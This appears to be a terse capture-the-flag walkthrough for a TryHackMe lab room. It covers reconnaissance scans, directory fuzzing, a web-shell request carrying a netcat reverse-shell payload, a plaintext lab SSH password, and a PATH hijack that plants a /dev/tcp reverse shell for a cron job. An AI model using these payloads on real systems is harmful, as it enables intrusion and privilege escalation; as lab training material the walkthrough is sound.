Hacker vs. Hacker

Room Link: https://tryhackme.com/room/hackervshacker

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

ffuf -u http://$VICTIM/cvs/FUZZ.pdf.php -w /usr/share/wfuzz/wordlist/general/common.txt

Kali

nc lvnp 1337

Started using Burp while testing out payloads to url-encode payloads more easy.

Burp

GET /cvs/shell.pdf.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.9.104+1337+>/tmp/f HTTP/1.1
Host: 10.10.21.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

x

I got the password for lachlan but it kept kicking me out

Kali

ssh lachlan@$VICTIM
Password: thisistheway123

There is a cronjob running that is killing our shell but can see it is using paths, it first used what is in lachlans bin fodler before /bin and /usr/bin so we can put a reverse shell instead.

Victim(www-data)

cat /etc/cron.d/persistence 

Victim(lachlan)

echo "bash -c 'bash -i >& /dev/tcp/$KALI/1338 0>&1'" > /home/lachlan/bin/pkill ; chmod  +x bin/pkill

Kali

nc -lvnp 1338